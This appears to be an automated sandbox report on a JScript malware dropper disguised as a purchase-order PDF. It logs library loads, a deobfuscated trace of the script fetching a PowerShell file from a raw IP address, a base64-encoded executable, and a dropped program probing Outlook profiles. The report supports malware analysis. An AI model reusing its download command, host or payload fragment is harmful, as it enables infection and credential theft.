                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Binary string: CZG3HF22.pdbH source: x.exe, 0000000A.00000000.1404811393.0000000000842000.00000002.00000001.01000000.00000008.sdmp, x.exe.8.dr
                  Source: Binary string: CZG3HF22.pdb source: x.exe, 0000000A.00000000.1404811393.0000000000842000.00000002.00000001.01000000.00000008.sdmp, x.exe.8.dr

                  Data Obfuscation

                  barindex
                  JScript performs obfuscated calls to suspicious functions
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22");IHost.Name();ITextStream.WriteLine(" entry:233 o:Windows%20Script%20Host f:CreateObject a0:%22WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:233 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:251 f:_0x5b7d25 a0:355 a1:%22BK7%24%22");ITextStream.WriteLine(" exit:251 f:_0x5b7d25 r:%22CreateObject%22");ITextStream.WriteLine(" entry:257 f:_0x5b7d25 a0:357 a1:%22%25J%5D%40%22");ITextStream.WriteLine(" exit:257 f:_0x5b7d25 r:%22Scripting.FileSystemObject%22");IHost.Name();ITextStream.WriteLine(" entry:247 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:247 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:267 f:_0x5b7d25 a0:352 a1:%22Ga%5Eb%22");ITextStream.WriteLine(" exit:267 f:_0x5b7d25 r:%22CreateObject%22");ITextStream.WriteLine(" entry:273 f:_0x49b702 a0:383");ITextStream.WriteLine(" exit:273 f:_0x49b702 r:%22MSXML2.XMLHTTP%22");IHost.Name();ITextStream.WriteLine(" entry:263 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:263 o:Windows%20Script%20Host f:CreateObject r:");IFileSystem3._00000000();ITextStream.WriteLine(" entry:317 o: f:FolderExists a0:%22C%3A%5CTemp%22");IFileSystem3.FolderExists("C:\Temp");IFileSystem3._00000000();ITextStream.WriteLine(" exit:317 o: f:FolderExists r:false");ITextStream.WriteLine(" entry:328 f:_0x49b702 a0:372");ITextStream.WriteLine(" exit:328 f:_0x49b702 r:%22CreateFolder%22");IFileSystem3._00000000();ITextStream.WriteLine(" entry:324 o: f:CreateFolder a0:%22C%3A%5CTemp%22");IFileSystem3.CreateFolder("C:\Temp");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:324 o: f:CreateFolder r:C%3A%5CTemp");ITextStream.WriteLine(" entry:1003 f:DownloadScript a0:%22http%3A%2F%2F176.65.144.3%2Fdev%2Fbelieve.ps1%22 a1:%22C%3A%5CTemp%5CWTRTRWFSHS.ps1%22");ITextStream.WriteLine(" exec:802 f:DownloadScript");ITextStream.WriteLine(" entry:820 f:_0x15e269 a0:353");ITextStream.WriteLine(" exit:820 f:_0x15e269 r:%22GET%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:814 o: f:Open a0:%22GET%22 a1:%22http%3A%2F%2F176.65.144.3%2Fdev%2Fbelieve.ps1%22 a2:false");IServerXMLHTTPRequest2.open("GET", "http://176.65.144.3/dev/believe.ps1", "false");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:814 o: f:Open r:undefined");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:827 o: f:Send");IServerXMLHTTPRequest2.send();ITextStream.WriteLine(" exit:257 f:_0x5b7d25 r:%22Scripting.FileSystemObject%22");IHost.Name();ITextStream.WriteLine(" entry:247 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.Fi
                  Found suspicious powershell code related to unpacking or dynamic code loading
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAD
                  Potential obfuscated javascript found
                  Source: PO-2513203-PDF.jsInitial file: High amount of function use 6
                  Source: x.exe.8.drStatic PE information: 0xB41A313D [Thu Oct 1 09:37:01 2065 UTC]
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 10_2_052627B4 push esp; ret 10_2_052627B7
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 10_2_05262C97 push esi; iretd 10_2_05262CEC
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 10_2_00E99D22 push esp; ret 10_2_00E99D23
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 11_2_0684890D push es; ret 11_2_06848920
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Local\Temp\RUNPEE.dllJump to dropped file
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
